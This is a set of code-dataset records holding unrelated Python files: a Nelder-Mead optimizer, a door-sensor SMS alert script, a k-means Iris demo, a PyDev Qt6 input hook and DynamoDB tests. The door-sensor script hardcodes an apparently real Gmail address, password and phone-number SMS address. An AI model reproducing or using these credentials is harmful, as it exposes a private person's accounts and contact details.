len(constants.NELDER_MEAD_SIMPLEX_VERBOSITY_DICT)\n\n if verbosity_dict_length == 0:\n verbosity_string = \"There are no keys available.\"\n elif verbosity_dict_length == 1:\n _key = list(constants.NELDER_MEAD_SIMPLEX_VERBOSITY_DICT.keys())[0]\n verbosity_string = f'The only available key is \"{_key}\".'\n else:\n _keys = list(sorted(constants.NELDER_MEAD_SIMPLEX_VERBOSITY_DICT.keys()))\n verbosity_string = \"The available keys are \"\n verbosity_string += \", \".join([str(f'\"{x}\"') for x in _keys[:-1]])\n verbosity_string += f' and \"{_keys[-1]}\"\".'\n\n raise KeyError(\n f'Verbosity key \"{verbosity}\" is not in the Nelder Mead Simplex Verbosity '\n f\"dictionary. {verbosity_string}\"\n )\n\n verbosity = constants.NELDER_MEAD_SIMPLEX_VERBOSITY_DICT[verbosity]\n\n if not isinstance(decimal_precision, int):\n raise TypeError(\n \"Expected argument decimal_precision to be an int, instead it is \"\n f\"{type(decimal_precision)}.\"\n )\n\n if decimal_precision < 1:\n raise ValueError(\n \"Expected argument decimal_precision to be a positive int, instead it is\"\n f\"{decimal_precision}.\"\n )\n\n return (\n function,\n alpha,\n beta,\n gamma,\n sigma,\n use_jakobovic_expand,\n epsilon,\n max_iterations,\n verbosity,\n decimal_precision,\n )\n\n\ndef clean_get_simplex_points(\n start: np.ndarray, stride: Union[float, int]\n) -> Tuple[np.ndarray, float]:\n \"\"\"\n Checks the __get_simplex_points arguments and returns them prepared for work.\n\n Args:\n start (np.ndarray): A numpy.ndarray representing the starting point for simplex\n generation.\n stride (Union[float, int]): A float or int representing the stride.\n\n Raises:\n TypeError: Raised if argument start is not a numpy.ndarray.\n ValueError: Raised if argument start is a zero-length vector.\n TypeError: Raised if argument stride is not a float or int.\n\n Returns:\n Tuple[np.ndarray, float]: Cleaned arguments.\n \"\"\"\n if not isinstance(start, np.ndarray):\n raise TypeError(\n \"Expected argument start to be a numpy.ndarray, instead it is \"\n f\"{type(start)}.\"\n )\n\n start = np.reshape(start, -1)\n\n if start.shape[0] == 0:\n raise ValueError(\n \"Expected argument starting point to be a vector with at least one \"\n \"element, instead it is empty.\"\n )\n\n if not isinstance(stride, (float, int)):\n raise TypeError(\n \"Expected argument stride to be a float or int, instead it is \"\n f\"{type(stride)}.\"\n )\n\n stride = float(stride)\n\n return start, stride\n\n\ndef __get_simplex_points(start: np.ndarray, stride: float) -> np.ndarray:\n \"\"\"\n Generates simplex points for a starting point.\n\n Args:\n start (np.ndarray): A numpy.ndarray representing the starting point for simplex\n generation.\n stride (float): A float representing the stride.\n\n Returns:\n np.ndarray: A matrix with each row representing a point of the simplex.\n \"\"\"\n\n points = np.tile(start, reps=(start.shape[0], 1))\n points = points + stride * np.eye(points.shape[0])\n\n return np.vstack([start, points])\n\n\ndef __reflect(\n centroid: np.ndarray, maximum_point: np.ndarray, alpha: float\n) -> np.ndarray:\n \"\"\"\n Reflects argument maximum_points wrt centroid by argument alpha.\n\n Args:\n centroid (np.ndarray): A numpy.ndarray representing the simplex centroid.\n maximum_point (np.ndarray): A numpy.ndarray representing the worst point of a\n simplex.\n alpha (float): A float representing the amount a point will be reflected.\n\n Returns:\n np.ndarray: A numpy.ndarray representing the reflected point.\n \"\"\"\n return (1 + alpha) * centroid - alpha * maximum_point\n\n\ndef __contract(\n centroid: np.ndarray, maximum_point: np.ndarray, beta: float\n) -> np.ndarray:\n \"\"\"\n Contracts argument maximum_points wrt centroid by argument beta.\n\n Args:\n centroid (np.ndarray): A numpy.ndarray representing the simplex centroid.\n maximum_point (np.ndarray): A numpy.ndarray representing the worst point of a\n simplex.\n beta (float): A float representing the amount a point will be contracted.\n\n Returns:\n np.ndarray: A numpy.ndarray representing the contracted point.\n \"\"\"\n return (1 - beta) * centroid + beta * maximum_point\n\n\ndef __expand(\n centroid: np.ndarray, reflected_point: np.ndarray, gamma: float\n) -> np.ndarray:\n \"\"\"\n Expands argument reflected_point wrt centroid by argument alpha.\n\n Args:\n centroid (np.ndarray): A numpy.ndarray representing the simplex centroid.\n maximum_point (np.ndarray): A numpy.ndarray representing the worst point of a\n simplex.\n gamma (float): A float representing the amount a point will be expanded.\n\n Returns:\n np.ndarray: A numpy.ndarray representing the expanded point.\n \"\"\"\n return (1 - gamma) * centroid + gamma * reflected_point\n\n\ndef __expand_jakobovic(\n centroid: np.ndarray, reflected_point: np.ndarray, gamma: float\n) -> np.ndarray:\n \"\"\"\n Expands argument reflected_point wrt centroid by argument alpha. This is a modified\n version which is supposedly the correct one, as said by prof. Jakobović.\n\n Args:\n centroid (np.ndarray): A numpy.ndarray representing the simplex centroid.\n maximum_point (np.ndarray): A numpy.ndarray representing the worst point of a\n simplex.\n gamma (float): A float representing the amount a point will be expanded.\n\n Returns:\n np.ndarray: A numpy.ndarray representing the expanded point.\n \"\"\"\n return (1 - gamma) * centroid - gamma * reflected_point\n\n\ndef __time_to_stop(\n simplex_values: np.ndarray, centroid_value: float, epsilon: float\n) -> bool:\n \"\"\"\n Checks if it's time to stop Nelder Mead Simplex Search.\n\n Args:\n simplex_values (np.ndarray): A numpy.ndarray representing the vector of simplex\n values.\n centroid_value (float): A float representing the value of the simplex centroid.\n epsilon (float): A float representing the error threshold.\n\n Returns:\n bool: True if the stopping condition of Nelder Mead Simplex Search has been met,\n False otherwise.\n \"\"\"\n difference_in_values = simplex_values - centroid_value\n squared_difference_in_values = np.square(difference_in_values)\n mean_squared_difference_in_values = np.mean(squared_difference_in_values)\n\n return np.sqrt(mean_squared_difference_in_values) <= epsilon\n\n\ndef __print_nmss_values(\n function: Function,\n centroid: np.ndarray,\n verbosity: int,\n decimal_precision: int,\n):\n \"\"\"\n Prints the Nelder Mead Simplex Search values.\n\n Args:\n function (Function): A Function representing the loss function.\n centroid (np.ndarray): A numpy.ndarray representing the simplex centroid.\n verbosity (int): An int representing the level of verbosity of the output during\n algorithm execution.\n decimal_precision (int): An int representing the number of decimal digits to\n round numbers outputted during algorithm execution.\n \"\"\"\n if verbosity == 1:\n print(f\"c = {np.around(centroid, decimal_precision)}\")\n elif verbosity > 1:\n result = function(centroid, dont_count=True)\n result = (\n np.around(result, 3)\n if isinstance(result, np.ndarray)\n else f\"{result:.0{decimal_precision}f}\"\n )\n\n print(f\"F(c = {np.around(centroid, decimal_precision)}) = {result}\")\n\n\ndef nelder_mead_simplex_search(\n function: Function,\n start: np.ndarray,\n stride: Union[float, int] = 1,\n alpha: float = 1.0,\n beta: float = 0.5,\n gamma: float = 2.0,\n sigma: float = 0.5,\n use_jakobovic_expand: bool = False,\n epsilon: float = 1e-6,\n max_iterations: int = 100000,\n verbosity: Optional[str] = None,\n decimal_precision: int = 3,\n) -> np.ndarray:\n \"\"\"\n Uses Nelder Mead Simplex Search to find an n-D optimum of a function.\n\n Args:\n function (Function): A Function representing the loss function.\n start (np.ndarray): A numpy.ndarray representing the starting point of the\n search.\n stride (Union[float, int], optional): A float or int representing the stride for\n simplex generation. Defaults to 1.\n alpha (float, optional): A float used in point reflection. Defaults to 1.0.\n beta (float, optional): A float used in point contraction. Defaults to 0.5.\n gamma (float, optional): A float used in point expansion. Defaults to 2.0.\n sigma (float, optional): A float used when moving points to the optimum.\n Defaults to 0.5.\n use_jakobovic_expand (float, optional): A bool determining whether or not to use\n the __expand_jakobovic method instead of the __expand method for point\n expansion. Defaults to False.\n epsilon (float, optional): A float representing the error threshold. Defaults to\n 1e-6.\n max_iterations (int, optional): An int representing the maximum number of\n iterations before the algorithm times out and returns the last found optimum.\n Defaults to 100000.\n verbosity (Optional[str], optional): A str representing the verbosity of the\n output during algorithm execution. Defaults to None (no output during algorithm\n execution).\n decimal_precision (int, optional): An int representing the number of decimal\n digits to round numbers outputted during algorithm execution. Defaults to 3.\n\n Returns:\n np.ndarray: A numpy.ndarray representing the last found optimum.\n \"\"\"\n (\n function,\n alpha,\n beta,\n gamma,\n sigma,\n use_jakobovic_expand,\n epsilon,\n max_iterations,\n verbosity,\n decimal_precision,\n ) = clean_nelder_mead_simplex_search_arguments(\n function=function,\n alpha=alpha,\n beta=beta,\n gamma=gamma,\n sigma=sigma,\n use_jakobovic_expand=use_jakobovic_expand,\n epsilon=epsilon,\n max_iterations=max_iterations,\n verbosity=verbosity,\n decimal_precision=decimal_precision,\n )\n start, stride = clean_get_simplex_points(start=start, stride=stride)\n\n simplex_points = __get_simplex_points(start=start, stride=stride)\n simplex_values = np.array([function(x) for x in simplex_points])\n\n timed_out = True\n\n expansion_method = __expand_jakobovic if use_jakobovic_expand else __expand\n\n for _ in range(max_iterations):\n minimum_index = np.argmin(simplex_values)\n maximum_index = np.argmax(simplex_values)\n centroid = np.mean(np.delete(simplex_points, maximum_index, axis=0), axis=0)\n\n __print_nmss_values(\n function=function,\n centroid=centroid,\n verbosity=verbosity,\n decimal_precision=decimal_precision,\n )\n\n reflected_point = __reflect(\n centroid=centroid, maximum_point=simplex_points[maximum_index], alpha=alpha\n )\n\n reflected_value = function(reflected_point)\n minimum_value = simplex_values[minimum_index]\n\n if reflected_value < minimum_value:\n expanded_point = expansion_method(\n centroid=centroid, reflected_point=reflected_point, gamma=gamma\n )\n expanded_value = function(expanded_point)\n\n if expanded_value < minimum_value:\n simplex_points[maximum_index] = expanded_point\n simplex_values[maximum_index] = expanded_value\n else:\n simplex_points[maximum_index] = reflected_point\n simplex_values[maximum_index] = reflected_value\n else:\n maximum_value = simplex_values[maximum_index]\n\n if all(np.delete(simplex_values, maximum_index, axis=0) < reflected_value):\n if reflected_value < maximum_value:\n simplex_points[maximum_index] = reflected_point\n simplex_values[maximum_index] = reflected_value\n\n # We need this here since we're introducing a new point and value\n minimum_index = np.argmin(simplex_values)\n maximum_index = np.argmax(simplex_values)\n\n # We need to do this since the maximum value has potentially changed\n maximum_value = simplex_values[maximum_index]\n\n contracted_point = __contract(\n centroid=centroid,\n maximum_point=simplex_points[maximum_index],\n beta=beta,\n )\n contracted_value = function(contracted_point)\n\n if contracted_value < maximum_value:\n simplex_points[maximum_index] = contracted_point\n simplex_values[maximum_index] = contracted_value\n else:\n for i, simplex_point in enumerate(simplex_points):\n if i == minimum_index:\n continue\n\n simplex_points[i] += (\n simplex_points[minimum_index] - simplex_points[i]\n ) * sigma\n simplex_values[i] = function(simplex_points[i])\n else:\n simplex_points[maximum_index] = reflected_point\n simplex_values[maximum_index] = reflected_value\n\n if __time_to_stop(\n simplex_values=simplex_values,\n centroid_value=function(centroid),\n epsilon=epsilon,\n ):\n timed_out = False\n break\n\n if timed_out:\n print(\n f\"WARNING: Nelder Mead Simplex Search timed out after {max_iterations} \"\n \"iterations - result might not be a minimum.\",\n file=sys.stderr,\n )\n\n # Do this to get a more precise result\n maximum_index = np.argmax(simplex_values)\n centroid = np.mean(np.delete(simplex_points, maximum_index, axis=0), axis=0)\n\n return centroid\n","sub_path":"dz/dz-02/src/searches/nelder_mead.py","file_name":"nelder_mead.py","file_ext":"py","file_size_in_byte":19872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"183170991","text":"__author__ = 'joelwhitney'\n# SIE 558 - Final Take - Query for events and send emails\n# this file:\n# 1) def function for sending messages\n# 2) def main function (re-run every ~1 sec)\n # 3) open connection to mysql db\n # 4) grab most recent tuple for each door\n # 5) check doors for open/close scenarios\n\n# goal check if any door is open longer than threshold\n # outsideDoor > 45 seconds\n # kitchenDoor > 45 seconds\n # freezerDoor > 45 seconds\n # refrigeratorDoor > 45 seconds\n\n# imports\nimport time\nimport datetime\nimport pymysql\nimport smtplib\n\ndef sendMessage(msg):\n # gmail credentials\n username = 'whitney.joel.b@gmail.com'\n password = 'Raptor5099'\n fromaddr = 'Joel Whitney'\n toaddrs = '2072499538@txt.att.net'\n\n # The actual mail send. 'msg' can't have symbols, just plain text\n server = smtplib.SMTP('smtp.gmail.com:587')\n server.starttls()\n server.login(username,password)\n server.sendmail(fromaddr, toaddrs, str(msg))\n server.quit()\n\ndef main():\n # set some variables as lists to match up with for loop for each door(i) (outside, kitchen, freezer, refrigerator)\n # last fid for each door - only compares different fid's\n lastfid = [0, 0, 0, 0]\n # set event statuses to closed (1) - used to check if opened\n eventStatus = ['1', '1', '1', '1']\n # set the tresholds as time in seconds - used as thresholds for alerts\n threshold = [45, 45, 45, 45]\n # set the counters - used to check how many times same event has been opened and resends bsaed on occurenceAlert factor\n counter = [0, 0, 0, 0]\n # set re-occurrence alert factor (this will check if seconds since insertTime is evenly divisible by below)\n occurrenceAlert = 300\n # messages list with items as list\n door1Message = [('NEW EVENT OutsideDoor open >' + str(threshold[0]) + 'seconds!'), ('EVENT CONT OutsideDoor still open') , ('EVENT CLOSED OutsideDoor closed')]\n door2Message = [('NEW EVENT KitchenDoor open >' + str(threshold[1]) + 'seconds!'), ('EVENT CONT KitchenDoor still open') , ('EVENT CLOSED KitchenDoor closed')]\n door3Message = [('NEW EVENT Freezer open >' + str(threshold[2]) + 'seconds!'), ('EVENT CONT Freezer still open') , ('EVENT CLOSED Freezer closed')]\n door4Message = [('NEW EVENT Refrigerator open >' + str(threshold[3]) + 'seconds!'), ('EVENT CONT Refrigerator still open') , ('EVENT CLOSED Refrigerator closed')]\n message = [door1Message, door2Message, door3Message, door4Message]\n\n # open file to write tuples to and start while loop to recursively run checks\n with open('eventOutput.txt', 'w') as f:\n while True:\n # 1) open connection to mysql db\n # open a connection to the database\n cnx = pymysql.connect(host='localhost',\n port=3306,\n user='joelw',\n passwd='Raptor5099',\n db='SIE558FinalProject')\n\n # 2) grab most recent tuple for each door\n # sets up cursor object to interact with MYSQL connection\n cursor = cnx.cursor()\n\n # SQL select statements <- returns max tuple for each doorID\n query1 = \"SELECT * FROM SIE558FinalProject.DoorSensors d \" \\\n \"INNER JOIN (SELECT MAX(insertTime) AS max_insertTime \" \\\n \"FROM SIE558FinalProject.DoorSensors GROUP BY doorID\" \\\n \") e ON d.insertTime = e.max_insertTime WHERE d.doorID = '1'; \"\n query2 = \"SELECT * FROM SIE558FinalProject.DoorSensors d \" \\\n \"INNER JOIN (SELECT MAX(insertTime) AS max_insertTime \" \\\n \"FROM SIE558FinalProject.DoorSensors GROUP BY doorID\" \\\n \") e ON d.insertTime = e.max_insertTime WHERE d.doorID = '2'; \"\n query3 = \"SELECT * FROM SIE558FinalProject.DoorSensors d \" \\\n \"INNER JOIN (SELECT MAX(insertTime) AS max_insertTime \" \\\n \"FROM SIE558FinalProject.DoorSensors GROUP BY doorID\" \\\n \") e ON d.insertTime = e.max_insertTime WHERE d.doorID = '3'; \"\n query4 = \"SELECT * FROM SIE558FinalProject.DoorSensors d \" \\\n \"INNER JOIN (SELECT MAX(insertTime) AS max_insertTime \" \\\n \"FROM SIE558FinalProject.DoorSensors GROUP BY doorID\" \\\n \") e ON d.insertTime = e.max_insertTime WHERE d.doorID = '4'; \"\n queryList = [query1, query2, query3, query4]\n\n # use for loop to execute function on cursor and retrieve data from db for each query\n for i in range(len(queryList)):\n cursor.execute(queryList[i])\n #print(\"Query is:\", queryList[i])\n\n # DO THIS WITHOUT FOR LOOP CUZ ONLY 1 TUPLE WILL BE RETURNED\n for line in cursor:\n #print(line)\n fid = str(line[0])\n doorID = str(line[1])\n doorState = str(line[2])\n insertTime = line[3]\n\n\n if fid != lastfid[i]:\n # 3a) check door1 for open scenarios\n # if doorState1 is open\n if doorState == '0':\n # if eventStatus1 is closed\n if eventStatus[i] == '1':\n # if door1 is open longer than threshold1 (deltaTime1 of now() - insertTime > threshold1)\n a = datetime.datetime.strptime(insertTime, \"%Y-%m-%d %H:%M:%S.%f\")\n b = datetime.datetime.now()\n deltaTime = (b - a).total_seconds()\n #print(deltaTime)\n if deltaTime > threshold[i]:\n # send appropiate response \"Event is open\" and write to a different table within db (EventsTable)\n sendMessage(str(message[i][0]))\n print(str(message[i][0]) + \" (\" + str(datetime.datetime.now()) + \")\")\n # write tuple to file\n tuple = str(cursor) + ',' + str(message[i][0])\n f.write(tuple)\n # flush to make sure all writes are committed\n f.flush()\n # change eventStatus1 to open\n eventStatus[i] = '0'\n # counter1 += 1 <- this signifies occurrence of same event\n counter[i] += 1\n # update last fid\n lastfid[i] = fid\n # else if eventStatus1 is open\n elif eventStatus[i] == '0':\n # if counter1 / 60 seconds % 5 min = 0 <- if counter of occurrences is divisible by 5 send reminder\n if counter[i] % occurrenceAlert == 0:\n # do appropiate response and write to a different table within db (EventsTable)\n sendMessage(str(message[i][1]))\n print(message[i][1] + \" (\" + str(datetime.datetime.now()) + \")\")\n # write tuple to file\n tuple = str(cursor) + ',' + str(message[i][1])\n f.write(tuple)\n # flush to make sure all writes are committed\n f.flush()\n # counter1 += 1 <- this signifies occurrence of same event\n counter[i] += 1\n # update last fid\n lastfid[i] = fid\n # else still add 1 to counter\n else:\n counter[i] += 1\n # update last fid\n lastfid[i] = fid\n # 3b) check door1 for closed scenarios\n else:\n # if doorState1 is closed and eventStatus1 is opened\n if doorState == '1' and eventStatus[i] == '0':\n # send appropiate response \"Event is closed\" and write to a different table within db (EventsTable)\n sendMessage(str(message[i][2]))\n print(message[i][2] + \" (\" + str(datetime.datetime.now()) + \")\")\n # write tuple to file\n tuple = str(cursor) + ',' + str(message[i][2])\n f.write(tuple)\n # flush to make sure all writes are committed\n f.flush()\n # change eventStatus1 to closed\n eventStatus[i] = '1'\n # change eventStatus1 to closed\n counter[i] = 0\n # update last fid\n lastfid[i] = fid\n # else do nothing and move on\n # sleep 1 second before going through again\n time.sleep(1)\n\n # close connections when done\n f.close()\n cursor.close()\n cnx.close()\n\nmain()\n","sub_path":"SIE558_FinalStreamQueries.py","file_name":"SIE558_FinalStreamQueries.py","file_ext":"py","file_size_in_byte":9680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"66711681","text":"import json\nfrom graphbrain import *\n\n\ndef edge2dict(hg, edge):\n return {'edge': ent2str(edge),\n 'text': hg.get_str_attribute(edge, 'text')}\n\n\ndef run(args):\n hg = hypergraph(args.hg)\n\n edge_data = [edge2dict(hg, edge) for edge in hg.all()]\n\n with open(args.outfile, 'w') as json_file:\n json.dump(edge_data, json_file)\n","sub_path":"graphbrain/commands/hg2json.py","file_name":"hg2json.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"641667980","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 3 08:14:51 2018\r\n\r\n@author: Ash\r\n\"\"\"\r\nfrom sklearn import datasets\r\nfrom sklearn.cluster import KMeans\r\n\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import style\r\nstyle.use(\"ggplot\")\r\n\r\n########################################\r\n# Load Data\r\n# \r\niris = datasets.load_iris()\r\nX_iris = iris.data\r\n\r\n# Retrieve only the first 2 variables\r\n# Petal Length + Petal Width from the data\r\n#\r\nX2_iris = iris.data[:,0:2]\r\n\r\n#print(X2_iris)\r\n#y_iris = iris.target\r\n#print(y_iris)\r\n#len(y_iris)\r\n\r\nplt.scatter(X2_iris[:,0], X2_iris[:,1], s=10, linewidth=5)\r\nplt.show()\r\n\r\n##################################\r\nclf = KMeans(n_clusters=3)\r\nclf.fit(X2_iris)\r\n\r\ncentroids = clf.cluster_centers_\r\nlabels = clf.labels_\r\nprint(centroids)\r\nprint(labels)\r\n\r\n####################################\r\n# Colors = Green, Red, Cyan, Blue, Black, Green\r\ncolors = [\"g.\",\"r.\",\"c.\",\"b.\",\"k.\",\"g.\"]\r\n\r\nfor i in range(len(X2_iris)):\r\n plt.plot(X2_iris[i][0], X2_iris[i][1], colors[labels[i]], markersize = 10)\r\n \r\nplt.scatter(centroids[:,0], centroids[:,1], marker='x', s=150, linewidth=5)\r\nplt.show()\r\n ","sub_path":"cs61/s9/02 k-Means cluster Ex02 Iris.py","file_name":"02 k-Means cluster Ex02 Iris.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"328270780","text":"import sys\nimport collections\ninput = sys.stdin.readline\n\nn = int(input())\narr = list(map(int, input().split()))\ndp = [0] * n\n\nfor i in range(n):\n maxi = 0\n for j in range(i):\n if arr[j] > arr[i]:\n maxi = max(maxi, dp[j])\n dp[i] = maxi + 1\n\nprint(max(dp))\n","sub_path":"백준/11722.py","file_name":"11722.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"29648491","text":"\n\n#calss header\nclass _ABSCISSA():\n\tdef __init__(self,): \n\t\tself.name = \"ABSCISSA\"\n\t\tself.definitions = [u'a number on an X-axis that shows the coordinate of a point']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_abscissa.py","file_name":"_abscissa.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"489758402","text":"# -*- coding: utf-8 -*-\n\"\"\"\nQt6's inputhook support function\n\nAuthor: Christian Boos\n\"\"\"\n\n#-----------------------------------------------------------------------------\n# Copyright (C) 2011 The IPython Development Team\n#\n# Distributed under the terms of the BSD License. The full license is in\n# the file COPYING, distributed as part of this software.\n#-----------------------------------------------------------------------------\n\n#-----------------------------------------------------------------------------\n# Imports\n#-----------------------------------------------------------------------------\n\nimport os\nimport signal\n\nimport threading\n\n\nfrom PyQt6 import QtCore, QtGui\nfrom pydev_ipython.inputhook import allow_CTRL_C, ignore_CTRL_C, stdin_ready\n\n# To minimise future merging complexity, rather than edit the entire code base below\n# we fake InteractiveShell here\nclass InteractiveShell:\n _instance = None\n @classmethod\n def instance(cls):\n if cls._instance is None:\n cls._instance = cls()\n return cls._instance\n def set_hook(self, *args, **kwargs):\n # We don't consider the pre_prompt_hook because we don't have\n # KeyboardInterrupts to consider since we are running under PyDev\n pass\n\n\n#-----------------------------------------------------------------------------\n# Module Globals\n#-----------------------------------------------------------------------------\n\ngot_kbdint = False\nsigint_timer = None\n\n#-----------------------------------------------------------------------------\n# Code\n#-----------------------------------------------------------------------------\n\ndef create_inputhook_qt6(mgr, app=None):\n \"\"\"Create an input hook for running the Qt6 application event loop.\n\n Parameters\n ----------\n mgr : an InputHookManager\n\n app : Qt Application, optional.\n Running application to use. If not given, we probe Qt for an\n existing application object, and create a new one if none is found.\n\n Returns\n -------\n A pair consisting of a Qt Application (either the one given or the\n one found or created) and a inputhook.\n\n Notes\n -----\n We use a custom input hook instead of PyQt6's default one, as it\n interacts better with the readline packages (issue #481).\n\n The inputhook function works in tandem with a 'pre_prompt_hook'\n which automatically restores the hook as an inputhook in case the\n latter has been temporarily disabled after having intercepted a\n KeyboardInterrupt.\n \"\"\"\n\n if app is None:\n app = QtCore.QCoreApplication.instance()\n if app is None:\n from PyQt6 import QtWidgets\n app = QtWidgets.QApplication([\" \"])\n\n # Re-use previously created inputhook if any\n ip = InteractiveShell.instance()\n if hasattr(ip, '_inputhook_qt6'):\n return app, ip._inputhook_qt6\n\n # Otherwise create the inputhook_qt6/preprompthook_qt6 pair of\n # hooks (they both share the got_kbdint flag)\n\n def inputhook_qt6():\n \"\"\"PyOS_InputHook python hook for Qt6.\n\n Process pending Qt events and if there's no pending keyboard\n input, spend a short slice of time (50ms) running the Qt event\n loop.\n\n As a Python ctypes callback can't raise an exception, we catch\n the KeyboardInterrupt and temporarily deactivate the hook,\n which will let a *second* CTRL+C be processed normally and go\n back to a clean prompt line.\n \"\"\"\n try:\n allow_CTRL_C()\n app = QtCore.QCoreApplication.instance()\n if not app: # shouldn't happen, but safer if it happens anyway...\n return 0\n app.processEvents(QtCore.QEventLoop.ProcessEventsFlag.AllEvents, 300)\n if not stdin_ready():\n # Generally a program would run QCoreApplication::exec()\n # from main() to enter and process the Qt event loop until\n # quit() or exit() is called and the program terminates.\n #\n # For our input hook integration, we need to repeatedly\n # enter and process the Qt event loop for only a short\n # amount of time (say 50ms) to ensure that Python stays\n # responsive to other user inputs.\n #\n # A naive approach would be to repeatedly call\n # QCoreApplication::exec(), using a timer to quit after a\n # short amount of time. Unfortunately, QCoreApplication\n # emits an aboutToQuit signal before stopping, which has\n # the undesirable effect of closing all modal windows.\n #\n # To work around this problem, we instead create a\n # QEventLoop and call QEventLoop::exec(). Other than\n # setting some state variables which do not seem to be\n # used anywhere, the only thing QCoreApplication adds is\n # the aboutToQuit signal which is precisely what we are\n # trying to avoid.\n timer = QtCore.QTimer()\n event_loop = QtCore.QEventLoop()\n timer.timeout.connect(event_loop.quit)\n while not stdin_ready():\n timer.start(50)\n # Warning: calling event_loop.exec_() can lead to hangs in REPL on mscOS PY-31931\n # Replacing it with event_loop.processEvents() fixes the issue, but leads to high CPU load on every os PY-42688\n event_loop.exec()\n timer.stop()\n except KeyboardInterrupt:\n global got_kbdint, sigint_timer\n\n ignore_CTRL_C()\n got_kbdint = True\n mgr.clear_inputhook()\n\n # This generates a second SIGINT so the user doesn't have to\n # press CTRL+C twice to get a clean prompt.\n #\n # Since we can't catch the resulting KeyboardInterrupt here\n # (because this is a ctypes callback), we use a timer to\n # generate the SIGINT after we leave this callback.\n #\n # Unfortunately this doesn't work on Windows (SIGINT kills\n # Python and CTRL_C_EVENT doesn't work).\n if(os.name == 'posix'):\n pid = os.getpid()\n if(not sigint_timer):\n sigint_timer = threading.Timer(.01, os.kill,\n args=[pid, signal.SIGINT] )\n sigint_timer.start()\n else:\n print(\"\\nKeyboardInterrupt - Ctrl-C again for new prompt\")\n\n\n except: # NO exceptions are allowed to escape from a ctypes callback\n ignore_CTRL_C()\n from traceback import print_exc\n print_exc()\n print(\"Got exception from inputhook_qt6, unregistering.\")\n mgr.clear_inputhook()\n finally:\n allow_CTRL_C()\n return 0\n\n def preprompthook_qt6(ishell):\n \"\"\"'pre_prompt_hook' used to restore the Qt6 input hook\n\n (in case the latter was temporarily deactivated after a\n CTRL+C)\n \"\"\"\n global got_kbdint, sigint_timer\n\n if(sigint_timer):\n sigint_timer.cancel()\n sigint_timer = None\n\n if got_kbdint:\n mgr.set_inputhook(inputhook_qt6)\n got_kbdint = False\n\n ip._inputhook_qt6 = inputhook_qt6\n ip.set_hook('pre_prompt_hook', preprompthook_qt6)\n\n return app, inputhook_qt6\n","sub_path":"python/helpers/pydev/pydev_ipython/inputhookqt6.py","file_name":"inputhookqt6.py","file_ext":"py","file_size_in_byte":7525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"46920034","text":"from __future__ import unicode_literals, print_function\nimport unittest\nimport boto3\nimport six\nimport sys\nimport os\nimport uuid\nimport json\nfrom os.path import dirname, join\nfrom moto import mock_dynamodb2\n\nfrom api.tweet import get, post\n\nclass TestAPIFunctions(unittest.TestCase):\n\n def init(self):\n os.environ['AWS_DEFAULT_REGION'] = 'us-east-2'\n dynamodb = boto3.resource('dynamodb', region_name='us-east-2')\n table_name = os.getenv('TWEET_TABLE', 'tweets')\n \n self.table = dynamodb.create_table(\n TableName=table_name,\n KeySchema=[\n {\n # Represents the YYYYMMDD \n # This is used to query all tweets for a given day\n 'AttributeName': 'created_key',\n 'KeyType': 'HASH' #Partition key\n },\n {\n 'AttributeName': 'created',\n 'KeyType': 'RANGE' #Sort key\n }\n ],\n AttributeDefinitions=[\n {\n 'AttributeName': 'id',\n 'AttributeType': 'S'\n },\n {\n 'AttributeName': 'content',\n 'AttributeType': 'S'\n },\n {\n 'AttributeName': 'created',\n 'AttributeType': 'N'\n },\n {\n 'AttributeName': 'created_key',\n 'AttributeType': 'N'\n },\n {\n 'AttributeName': 'header',\n 'AttributeType': 'S'\n }\n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits': 10,\n 'WriteCapacityUnits': 10\n }\n )\n\n # Wait until the table exists.\n self.table.meta.client.get_waiter('table_exists').wait(TableName=table_name)\n assert self.table.table_status == 'ACTIVE'\n\n def tearDown(self):\n pass\n\n @mock_dynamodb2\n def test_post(self):\n self.init() \n r1 = post.handler({'body': '''{\"content\":\"Hello\", \"header\":\"THIS\"}'''}, {})\n r2 = post.handler({'body': '''{\"content\":\"Hello2\", \"header\":\"THAT\"}'''}, {})\n \n # HTTP status of 200?\n assert r1['statusCode'] == '200'\n assert r2['statusCode'] == '200'\n\n b1 = json.loads(r1['body'])\n b2 = json.loads(r2['body'])\n\n # Are the results correct?\n assert 'content' in b1 and 'header' in b1\n assert 'content' in b2 and 'header' in b2\n assert b1['content'] == 'Hello' and b1['header'] == 'THIS'\n assert b2['content'] == 'Hello2' and b2['header'] == 'THAT'\n \n @mock_dynamodb2\n def test_post_failed(self):\n self.init() \n result = post.handler({'body': '{}'}, {})\n # HTTP status of 400?\n assert result['statusCode'] == '400'\n # Are the results correct?\n assert 'error' in result['body'].lower()\n\n\n \n @mock_dynamodb2\n def test_get(self):\n self.init()\n r1 = post.handler({'body': '''{\"content\":\"Hello\", \"header\":\"THIS\"}'''}, {})\n r2 = post.handler({'body': '''{\"content\":\"Hello2\", \"header\":\"THAT\"}'''}, {})\n result = get.handler({}, {})\n\n assert result['statusCode'] == '200'\n body = json.loads(result['body'])\n assert len(body) == 2\n assert body[0]['content'] == 'Hello'\n assert body[1]['content'] == 'Hello2' \n\n \n\nif __name__ == '__main__':\n 